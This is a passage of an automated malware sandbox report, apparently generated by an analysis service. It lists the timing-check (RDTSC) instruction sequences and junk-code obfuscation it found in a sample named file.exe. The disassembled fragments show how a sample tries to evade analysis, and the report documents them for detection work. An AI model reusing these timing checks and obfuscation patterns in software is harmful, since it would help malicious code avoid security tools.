                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101642A second address: 101642E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101642E second address: 1016469 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CE44013h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d jo 00007F0C5CE44008h 0x00000013 pushad 0x00000014 popad 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F0C5CE4400Fh 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1016469 second address: 101647D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CC49420h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101647D second address: 1016487 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F0C5CE44006h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1016487 second address: 101648B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10164C8 second address: 1016545 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0C5CE44008h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, 5B2E4A05h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F0C5CE44008h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c call 00007F0C5CE4400Bh 0x00000031 push edx 0x00000032 pop edx 0x00000033 pop edi 0x00000034 jmp 00007F0C5CE44017h 0x00000039 call 00007F0C5CE44009h 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F0C5CE44017h 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1016545 second address: 101654E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101654E second address: 1016559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1016559 second address: 1016599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ecx 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F0C5CC49429h 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0C5CC49427h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1016599 second address: 101659E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101659E second address: 10165B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1016690 second address: 101669A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101669A second address: 1016705 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F0C5CC49427h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 popad 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push edx 0x0000001f jnc 00007F0C5CC4942Ch 0x00000025 pop edx 0x00000026 pop eax 0x00000027 movsx edx, dx 0x0000002a lea ebx, dword ptr [ebp+12458310h] 0x00000030 mov dword ptr [ebp+122D18B9h], ecx 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a jp 00007F0C5CC49416h 0x00000040 push eax 0x00000041 pop eax 0x00000042 popad 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10167F2 second address: 10167F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10167F7 second address: 101686D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CBCB6D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 2A2C91D9h 0x00000010 sub dword ptr [ebp+122D3044h], edx 0x00000016 lea ebx, dword ptr [ebp+12458319h] 0x0000001c push 00000000h 0x0000001e push edx 0x0000001f call 00007F0C5CBCB6C8h 0x00000024 pop edx 0x00000025 mov dword ptr [esp+04h], edx 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc edx 0x00000032 push edx 0x00000033 ret 0x00000034 pop edx 0x00000035 ret 0x00000036 jmp 00007F0C5CBCB6D5h 0x0000003b sub dword ptr [ebp+122DB59Bh], edi 0x00000041 xchg eax, ebx 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 ja 00007F0C5CBCB6C6h 0x0000004b pushad 0x0000004c popad 0x0000004d popad 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101686D second address: 1016873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1016873 second address: 10168A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CBCB6D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F0C5CBCB6CBh 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10168A0 second address: 10168A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101693C second address: 101699A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jne 00007F0C5CBCB6C6h 0x0000000e popad 0x0000000f popad 0x00000010 add dword ptr [esp], 5BB05AD9h 0x00000017 jnl 00007F0C5CBCB6CCh 0x0000001d push 00000003h 0x0000001f mov di, 59EFh 0x00000023 push 00000000h 0x00000025 call 00007F0C5CBCB6D5h 0x0000002a mov esi, dword ptr [ebp+122D1E1Bh] 0x00000030 pop esi 0x00000031 push 00000003h 0x00000033 mov dword ptr [ebp+122D28F4h], ecx 0x00000039 push 888EB9D7h 0x0000003e push eax 0x0000003f push edx 0x00000040 jnl 00007F0C5CBCB6C8h 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101699A second address: 10169A4 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0C5DC268ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFAF65 second address: FFAF7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C5CBCB6D5h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1034D21 second address: 1034D35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0C5DC268ABh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1034D35 second address: 1034D39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103519D second address: 10351B2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0C5DC268A6h 0x00000008 jmp 00007F0C5DC268ABh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1035309 second address: 103532A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jl 00007F0C5CBCB6D4h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103557B second address: 1035583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1035583 second address: 1035592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnp 00007F0C5CBCB6C8h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1035592 second address: 1035597 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10356DA second address: 10356E4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10356E4 second address: 10356E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1035ADB second address: 1035AE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10364F3 second address: 10364FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036654 second address: 103666F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F0C5CBCB6C6h 0x0000000a jmp 00007F0C5CBCB6D1h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1038C42 second address: 1038C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0C5DC268B6h 0x0000000b popad 0x0000000c jmp 00007F0C5DC268AFh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1038C6E second address: 1038C82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CBCB6CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1038C82 second address: 1038CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F0C5DC268A6h 0x0000000f jmp 00007F0C5DC268B1h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103EAC2 second address: 103EAC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104263E second address: 1042654 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C5DC268B2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1041C70 second address: 1041C76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1041C76 second address: 1041C7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1042250 second address: 1042255 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10423D7 second address: 10423E1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0C5DC268A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10423E1 second address: 10423FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0C5CBCB6D5h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104351E second address: 1043560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnp 00007F0C5DC268A8h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007F0C5DC268B4h 0x00000017 mov eax, dword ptr [eax] 0x00000019 jc 00007F0C5DC268B2h 0x0000001f jns 00007F0C5DC268ACh 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 pushad 0x0000002a push edi 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1043560 second address: 1043595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007F0C5CBCB6CEh 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e popad 0x0000000f pop eax 0x00000010 push 4BCF3701h 0x00000015 push eax 0x00000016 push edx 0x00000017 jg 00007F0C5CBCB6D5h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1043A5D second address: 1043A66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1043A66 second address: 1043A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1044227 second address: 104424C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0C5DC268ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e jmp 00007F0C5DC268B0h 0x00000013 pop ecx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1044447 second address: 104444C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10446AF second address: 10446B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1044CDD second address: 1044D79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0C5CBCB6CCh 0x0000000a jp 00007F0C5CBCB6C6h 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F0C5CBCB6C8h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e mov dword ptr [ebp+122D30F0h], ecx 0x00000034 call 00007F0C5CBCB6CFh 0x00000039 mov dword ptr [ebp+1247DD85h], ebx 0x0000003f pop edi 0x00000040 push 00000000h 0x00000042 push edx 0x00000043 pushad 0x00000044 or ecx, 41169623h 0x0000004a xor dword ptr [ebp+122D1B92h], edi 0x00000050 popad 0x00000051 pop esi 0x00000052 push 00000000h 0x00000054 push 00000000h 0x00000056 push ebx 0x00000057 call 00007F0C5CBCB6C8h 0x0000005c pop ebx 0x0000005d mov dword ptr [esp+04h], ebx 0x00000061 add dword ptr [esp+04h], 00000016h 0x00000069 inc ebx 0x0000006a push ebx 0x0000006b ret 0x0000006c pop ebx 0x0000006d ret 0x0000006e jmp 00007F0C5CBCB6D1h 0x00000073 xchg eax, ebx 0x00000074 push eax 0x00000075 push edx 0x00000076 push ecx 0x00000077 pushad 0x00000078 popad 0x00000079 pop ecx 0x0000007a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1045610 second address: 1045615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1047DB3 second address: 1047DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1047DB7 second address: 1047E03 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jno 00007F0C5DC268A8h 0x0000000e pushad 0x0000000f jng 00007F0C5DC268A6h 0x00000015 push edi 0x00000016 pop edi 0x00000017 popad 0x00000018 popad 0x00000019 nop 0x0000001a push 00000000h 0x0000001c add esi, dword ptr [ebp+122D345Ch] 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push edi 0x00000027 call 00007F0C5DC268A8h 0x0000002c pop edi 0x0000002d mov dword ptr [esp+04h], edi 0x00000031 add dword ptr [esp+04h], 00000014h 0x00000039 inc edi 0x0000003a push edi 0x0000003b ret 0x0000003c pop edi 0x0000003d ret 0x0000003e push eax 0x0000003f jc 00007F0C5DC268B0h 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1049403 second address: 1049496 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CBCB6D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F0C5CBCB6C8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 mov esi, ebx 0x00000029 push 00000000h 0x0000002b jnl 00007F0C5CBCB6CCh 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007F0C5CBCB6C8h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 00000017h 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d mov esi, 212BCB3Bh 0x00000052 xchg eax, ebx 0x00000053 jmp 00007F0C5CBCB6D6h 0x00000058 push eax 0x00000059 pushad 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1049496 second address: 10494B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C5DC268B4h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10494B3 second address: 10494B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1049DB9 second address: 1049DBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104FE1A second address: 104FE74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CBCB6D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d add ebx, dword ptr [ebp+122D32EDh] 0x00000013 push 00000000h 0x00000015 mov dword ptr [ebp+122D177Dh], ecx 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push edx 0x00000020 call 00007F0C5CBCB6C8h 0x00000025 pop edx 0x00000026 mov dword ptr [esp+04h], edx 0x0000002a add dword ptr [esp+04h], 00000016h 0x00000032 inc edx 0x00000033 push edx 0x00000034 ret 0x00000035 pop edx 0x00000036 ret 0x00000037 xchg eax, esi 0x00000038 push eax 0x00000039 push edx 0x0000003a jc 00007F0C5CBCB6C8h 0x00000040 push esi 0x00000041 pop esi 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1050F2B second address: 1050F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F0C5DC268ACh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1050F40 second address: 1050F51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C5CBCB6CDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1050F51 second address: 1050FB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5DC268B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F0C5DC268A8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push esi 0x0000002b call 00007F0C5DC268A8h 0x00000030 pop esi 0x00000031 mov dword ptr [esp+04h], esi 0x00000035 add dword ptr [esp+04h], 00000018h 0x0000003d inc esi 0x0000003e push esi 0x0000003f ret 0x00000040 pop esi 0x00000041 ret 0x00000042 push 00000000h 0x00000044 add dword ptr [ebp+122D1B68h], ecx 0x0000004a push eax 0x0000004b pushad 0x0000004c push edi 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052170 second address: 10521F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CBCB6CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b jmp 00007F0C5CBCB6D3h 0x00000010 pop edi 0x00000011 nop 0x00000012 mov edi, 458E009Dh 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007F0C5CBCB6C8h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 jnc 00007F0C5CBCB6DDh 0x00000039 mov ebx, dword ptr [ebp+1247C4D3h] 0x0000003f push 00000000h 0x00000041 jmp 00007F0C5CBCB6D1h 0x00000046 xchg eax, esi 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a push edi 0x0000004b pop edi 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10521F8 second address: 1052212 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5DC268ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jno 00007F0C5DC268A6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052212 second address: 1052222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jo 00007F0C5CBCB6CEh 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10568A2 second address: 10568E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp], eax 0x00000008 pushad 0x00000009 xor dword ptr [ebp+122D2DBEh], eax 0x0000000f mov si, C980h 0x00000013 popad 0x00000014 push 00000000h 0x00000016 mov edi, eax 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007F0C5DC268A8h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 00000019h 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 xor dword ptr [ebp+122D19BAh], edx 0x0000003a xchg eax, esi 0x0000003b pushad 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10568E8 second address: 10568F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10568F3 second address: 10568F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1058797 second address: 10587AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C5CBCB6D4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1058840 second address: 1058845 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
